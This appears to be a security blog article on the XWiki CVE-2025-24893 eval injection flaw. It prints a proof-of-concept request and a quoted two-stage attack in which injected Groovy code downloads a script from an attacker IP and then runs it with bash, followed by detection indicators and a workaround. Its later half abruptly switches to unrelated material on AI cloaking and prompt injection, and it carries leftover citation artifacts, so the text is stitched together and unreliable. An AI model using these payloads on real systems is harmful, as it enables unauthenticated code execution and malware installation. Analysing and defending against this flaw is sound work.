xwiki

Critical XWiki Platform Vulnerability: The CVE-2025-24893 Eval Injection Crisis Shaking Enterprise Collaboration Systems

CISA Issues Urgent Warning as Unauthenticated Remote Code Execution Flaw Becomes Active Attack Vector for Cryptocurrency Mining and System Compromise

Executive Summary: A Perfect Storm of Vulnerability

On October 30, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) escalated its response to a critical security flaw in XWiki Platform, adding CVE-2025-24893 to its Known Exploited Vulnerabilities (KEV) catalog. This eval injection vulnerability has transformed from a theoretical threat into an active weapon in cybercriminal arsenals, with confirmed exploitation campaigns deploying cryptocurrency miners and establishing persistent backdoors across enterprise networks.

The vulnerability, carrying a devastating CVSS score of 9.8 out of 10, allows completely unauthenticated attackers to execute arbitrary Groovy code on XWiki servers through a single malformed HTTP request. What makes this particularly alarming is the zero-barrier entry: no credentials, no user interaction, and no special network positioning required—just network connectivity to a vulnerable instance.

VulnCheck researchers have observed active exploitation, capturing a two-stage attack chain that delivers cryptocurrency miners through the template-injection vulnerability SecurityWeek. The attacks, originating from Vietnam-based infrastructure, demonstrate sophisticated timing—staging downloader scripts in the first pass and executing them 20 minutes later to evade detection systems.

The Vulnerability Landscape: 2025 by the Numbers

To understand the severity of CVE-2025-24893, we must examine it within the broader context of the 2025 vulnerability landscape:

MetricH1 2024H1 2025Change
Total CVEs Published20,38523,667+16%
Actively Exploited Vulnerabilities138161+17%
Vulnerabilities with Public PoCN/A67 (42%)
Applications with ≥1 Vulnerability73%75%+2%
Average Breach Detection Time287 days277 days-3.5%
Average Data Breach Cost$4.24M$4.35M+2.6%

In the first half of 2025, Cross-Site Scripting (CWE-79) and SQL Injection (CWE-89) represented the highest share of weaknesses, followed by Cross-Site Request Forgery (CWE-352), generic Injection flaws (CWE-74), and Missing Authorization (CWE-862) Recorded Future. Eval injection vulnerabilities like CVE-2025-24893 fall under CWE-95 and represent one of the most dangerous classes of injection attacks.

XWiki Platform: Understanding the Target

XWiki is an open-source enterprise wiki platform designed for collaborative content management, knowledge bases, and intranet portals. Its adoption spans across education, government, and corporate sectors, making it a high-value target for attackers seeking to compromise sensitive organizational data.

Table 2: XWiki Platform Market Profile

CategoryDetails
Platform TypeOpen-source enterprise wiki and collaboration platform
Primary Use CasesKnowledge management, intranets, project documentation, team collaboration
Target IndustriesEducation, government, enterprise, open-source communities
Programming LanguageJava (backend), Groovy (scripting), Velocity (templating)
Search EngineApache Solr (embedded)
Deployment ModelsOn-premises, cloud-hosted, hybrid
Typical ExposureInternet-facing installations common for external collaboration

CVE-2025-24893: Technical Deep Dive

DateEventImpact Level
May 2024Vulnerability reported by Trend Micro’s John Kwak :antCitation[]{citations=”dfeaa031-0be8-473c-bd6b-523658a1e6fd”}Discovery
June 2024Patches released in XWiki versions 15.10.11, 16.4.1, and 16.5.0RC1 :antCitation[]{citations=”62767701-a8e5-4c45-b8a4-b0ccbe3895c1″}Patch Available
December 2024Technical details emerge publiclyPublic Disclosure
February 2025NVD advisory published; detection added to Pentest-Tools.comCVE Published
Early 2025Multiple PoC exploits published on GitHubExploit Available
March 2025VulnCheck adds vulnerability to their KEV catalog based on CrowdSec and Cyble reconnaissance reports :antCitation[]{citations=”f81704b7-2ba5-4338-9fe1-d2b493da7749″}Reconnaissance
April 2025Automated exploit script (CVE-2025-24893.py) publicly available on Exploit-DBWeaponized
October 28, 2025VulnCheck Canaries capture two-stage cryptocurrency mining attack chain :antCitation[]{citations=”1a71d4ab-4696-4b0e-8666-d56e0e8329a8″}Active Exploitation
October 30, 2025CISA adds CVE-2025-24893 to Known Exploited Vulnerabilities catalogCISA KEV

The Mechanics of the Attack

CVE-2025-24893 stems from insufficient input sanitization in the SolrSearch macro. This macro, used for querying the internal search index, does not properly validate user input, allowing attackers to inject and execute arbitrary Groovy code via specially crafted requests IONIX.

The vulnerability resides in the Main.SolrSearchMacros file, specifically in how the system handles RSS feed generation for search results. When an attacker sends a malicious payload to the SolrSearch endpoint, the Groovy code embedded within the request is evaluated and executed in the context of the XWiki server process.

Proof of Concept Example:

GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from" + " search text:" + (23 + 19)){{/groovy}}{{/async}}

If the server responds with “Hello from search text:42” in the RSS feed title, the instance is vulnerable. This simple test demonstrates that arbitrary code execution is possible—attackers can replace this benign calculation with malicious commands.

Table 3: CVE-2025-24893 Vulnerability Profile

AttributeValue
CVE IdentifierCVE-2025-24893
CVSS 3.1 Score9.8 (Critical)
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score93.998% (100th percentile) / 92.01% :antCitation[]{citations=”356d8bfd-c1aa-4a38-b0d5-23a066acbc73,f31936c7-435b-469a-8361-dfdeba0450c9″}
CWE ClassificationCWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’)
Attack VectorNetwork (Remote)
Attack ComplexityLow
Privileges RequiredNone (Guest access)
User InteractionNone required
Affected VersionsXWiki Platform 5.3-milestone-2 through 15.10.10 and 16.0.0-rc-1 through 16.4.0 :antCitation[]{citations=”880352de-d958-4b6e-87e7-4c8bc4ac0671″}
Patched Versions15.10.11, 16.4.1, 16.5.0RC1
Exploitation StatusACTIVELY EXPLOITED IN THE WILD

Understanding Eval Injection: The Anatomy of CWE-95

Eval injection represents one of the most severe vulnerability classes in web application security. Unlike other injection attacks that target specific subsystems (databases, operating systems), eval injection directly compromises the application’s execution environment.

Table 4: Injection Attack Comparison Matrix

Injection TypeCWEAvg. CVSSPrimary TargetAuth Required?Prevalence
Eval InjectionCWE-959.2Application runtimeOften NoLow
SQL InjectionCWE-898.8Database layerOften NoVery High
Command InjectionCWE-789.0Operating systemUsually YesMedium
XSS (Cross-Site Scripting)CWE-796.5Client browserNoVery High
LDAP InjectionCWE-907.8Directory servicesOften NoLow
XML InjectionCWE-917.2XML parsersVariesMedium
CSRFCWE-3526.8User sessionUser must be auth’dHigh

According to OWASP, 94% of applications were tested for some form of injection, with the 33 CWEs mapped into the injection category having the second most occurrences in applications OWASP.

Real-World Exploitation: The Cryptocurrency Mining Campaign

VulnCheck researchers observed a sophisticated two-stage attack chain originating from Vietnam-based infrastructure. The exploitation proceeds with at least 20 minutes of separation between stages: the first pass stages a downloader (writes a file to disk), and the second pass later executes it VulnCheck.

Attack Chain Breakdown

Stage 1: Downloader Deployment

bash

GET /bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}
new File('/tmp/11909').write(new URL('http://193.32.208.24:8080/rDuiQRKhs5/x521').text)
{{/groovy}}{{/async}}

Stage 2: Execution (20+ minutes later)

bash

GET /bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}
println("bash /tmp/11909".execute().text)
{{/groovy}}{{/async}}

When executed, /tmp/11909 downloads and runs x521 and x522, where x521 fetches and installs a coinminer (tcrond) and x522 starts the miner and attempts to kill competing miners VulnCheck.

Table 5: Attack Infrastructure Analysis

IOC TypeValuePurpose
C2 IP Address193.32.208.24:8080Malware distribution server
GeolocationVietnamAttacker infrastructure
File Path/tmp/11909Staged downloader script
File Path/var/tmp/…/tcrondCryptocurrency miner binary
Payload Componentx521Miner installation script
Payload Componentx522Miner launcher & competitor killer
Timing Delay20+ minutesEvasion technique (separate stage detection)
User-AgentMozilla/5.0 (X11; Linux i686) AppleWebKit/537.36Disguised as legitimate browser

Impact Assessment: The Ripple Effect

The consequences of CVE-2025-24893 exploitation extend far beyond cryptocurrency mining. The vulnerability provides attackers with complete control over the XWiki server, enabling a cascade of malicious activities.

Table 6: Potential Impact Scenarios

Attack ScenarioLikelihoodImpact SeverityBusiness Consequences
Data ExfiltrationVery HighCriticalTheft of intellectual property, customer data, credentials, confidential documents
Ransomware DeploymentHighCriticalComplete system encryption, business disruption, extortion demands ($4.54M avg cost)
Lateral MovementVery HighHighCompromise of connected systems, domain controller access, network-wide breach
Cryptocurrency MiningConfirmedMediumResource consumption, performance degradation, increased infrastructure costs
Backdoor InstallationVery HighCriticalPersistent unauthorized access, long-term espionage, supply chain compromise
Denial of ServiceHighHighSystem crashes, service unavailability, productivity loss
Privilege EscalationHighHighAdmin-level access, complete infrastructure control
Supply Chain AttackMediumCriticalMalware injection into wiki content, poisoning of knowledge bases

An internet-facing instance can be fully compromised with no authentication or user interaction required, enabling full disclosure, modification or destruction of data and potential full site take-down RedPacket Security.

Mitigation and Remediation Strategies

Immediate Actions Required

Priority 1: Patch Deployment

Organizations running affected XWiki versions must immediately upgrade to patched releases:

  • Version 15.10.11 (for 15.x branch)
  • Version 16.4.1 (for 16.x branch)
  • Version 16.5.0RC1 or later

Table 7: Remediation Options Comparison

Remediation MethodEffectivenessImplementation TimeDowntime RequiredConsiderations
Full Upgrade to Patched Version100%2-8 hoursYes (1-4 hours)Most comprehensive solution; requires testing
Manual File Modification (Workaround)~95%30-60 minutesMinimal (5-15 min)Temporary measure; modify Main.SolrSearchMacros line 955
WAF Rule Deployment70-85%15-30 minutesNoneComplementary protection; may have false positives
Disable Guest Access60-75%5-15 minutesNoneReduces attack surface but limits functionality
Network Segmentation/Firewall Rules50-70%1-4 hoursNoneReduces exposure but doesn’t fix vulnerability
Service Deactivation (Emergency)100%ImmediateCompleteLast resort for critical environments under active attack

Temporary Workaround Details:

For organizations unable to immediately upgrade, administrators can modify the Main.SolrSearchMacros file. Specifically, on line 955 in SolrSearchMacros.xml, enforce an application/xml content type for the rawResponse macro, mirroring the template’s secure output handling at macros.vm#L2824. This blocks malicious payload execution without requiring a full upgrade.

Code modification:

xml

<!-- Change line 955 in Main.SolrSearchMacros -->
<!-- FROM: -->
$rawResponse

<!-- TO: -->
#set($contentType = "application/xml")
$response.setContentType($contentType)
$rawResponse

Detection and Monitoring

Table 8: Detection Methods and Indicators

Detection MethodIndicator/PatternDetection RateTool/Source
Log Analysis/bin/get/Main/SolrSearch?media=rss&text=}}}{{async OR {{groovy}}HighWeb server logs, SIEM
Network IDS/IPSNuclei template for CVE-2025-24893HighNuclei scanner
Vulnerability ScanningVersion detection: XWiki < 15.10.11 or 16.0-16.4.0Very HighPentest-Tools, Nessus, Qualys
File Integrity MonitoringUnexpected files in /tmp/, /var/tmp/ directoriesMediumAIDE, Tripwire, OSSEC
Process MonitoringSuspicious processes: tcrond, unusual CPU usage patternsMediumEDR solutions, top/htop
Network Traffic AnalysisConnections to 193.32.208.24:8080 or similar C2 serversHighNetFlow, Zeek, Suricata
Behavioral Analysis20-minute delay between initial request and executionLow-MediumAdvanced SIEM correlation

Industry Impact and Sectoral Risk Analysis

Table 9: Sector-Specific Risk Assessment

SectorXWiki AdoptionExposure RiskData SensitivityOverall RiskPrimary Concerns
Higher EducationVery HighCriticalHighCRITICALStudent data, research IP, often internet-facing
GovernmentHighHighCriticalCRITICALClassified info, citizen data, national security implications
Enterprise/CorporateMedium-HighMediumHighHIGHIP theft, corporate espionage, customer data
HealthcareMediumMediumCriticalHIGHPHI/HIPAA violations, patient safety, ransomware target
Financial ServicesLow-MediumLowCriticalMEDIUMFinancial fraud, regulatory penalties, customer trust
Open Source CommunitiesVery HighCriticalMediumHIGHCode repository compromise, supply chain attacks
Technology VendorsMediumMediumHighHIGHProduct documentation compromise, customer impact

Real-World Impact Scenarios

Scenario 1: Corporate Espionage

A competitor uses agent-aware cloaking to poison AI research tools, causing a Fortune 500 company to make strategic decisions based on falsified market data. Estimated loss: $50-100 million.

Scenario 2: Political Manipulation

During an election cycle, AI-powered news aggregators are fed manipulated content about candidates, influencing voter perception without leaving traditional traces.

Scenario 3: Financial Fraud

AI-powered trading algorithms are fed false financial data through cloaked pages, triggering automated trades that benefit attackers. Market manipulation cost: $500 million+.

The Human Element

Table 11: User Awareness and Behavior

DemographicAI Trust LevelSecurity AwarenessVerification Habits
Gen Z (18-24)68% trust32% awareRarely verify
Millennials (25-40)54% trust48% awareSometimes verify
Gen X (41-56)41% trust61% awareOften verify
Boomers (57+)28% trust45% awareUsually verify
Tech Professionals35% trust87% awareAlways verify

Regulatory Response and Compliance

As of 2025, several jurisdictions are implementing AI security regulations:

  • EU AI Act: Mandatory risk assessments for high-risk AI systems
  • US Executive Orders: Federal agencies required to implement AI security frameworks
  • China’s AI Regulations: Strict content control and security measures
  • GDPR Extensions: New provisions for AI data processing

Table 12: Global Regulatory Landscape

RegionRegulation StatusEnforcement LevelPenalties
European UnionActiveStrictUp to 7% global revenue
United StatesIn developmentModerateCase-by-case
United KingdomConsultation phaseModerateTBD
ChinaActiveVery strictLicense revocation
JapanIn developmentLightAdvisory only

Best Practices for Organizations

  1. Implement Multi-Factor Verification: Never rely solely on AI-retrieved information for critical decisions
  2. Continuous Monitoring: Deploy 24/7 monitoring systems for AI agent behavior
  3. Red Team Exercises: Conduct regular adversarial testing with prompt injection scenarios
  4. Employee Training: Ensure staff understand AI manipulation risks
  5. Vendor Assessment: Evaluate AI service providers’ security measures
  6. Incident Response Plans: Develop specific protocols for AI security breaches

Emerging Technologies and Future Defenses

Researchers are exploring new architectures that could inherently block prompt injections in agentic systems, using strict information-flow controls to prevent an AI agent from ever outputting data it wasn’t authorized to access.

Industry standards are emerging, and major tech providers such as Microsoft are continually investing in more deterministic security features to stay ahead of attackers.

Conclusion: A New Reality of Digital Security

Agent-aware cloaking evolves classic SEO tactics into AI overview (AIO) threats, amplifying impacts on automated judgments like product rankings or risk assessments. Hidden prompt injections could even steer AI behaviors toward malware or data exfiltration.

As AI browsers like Atlas proliferate, defense measures will define the battle for web integrity. Organizations that fail to invest in multi-layered protection of AI systems now risk catastrophic consequences in the near future.

Key Takeaway: This is not a theoretical threat but a current reality requiring immediate action from every organization using AI technologies. The window for proactive defense is closing rapidly, and the cost of inaction grows exponentially with each passing quarter.

The question is no longer whether your organization will face AI manipulation attacks, but when—and whether you’ll be prepared to defend against them.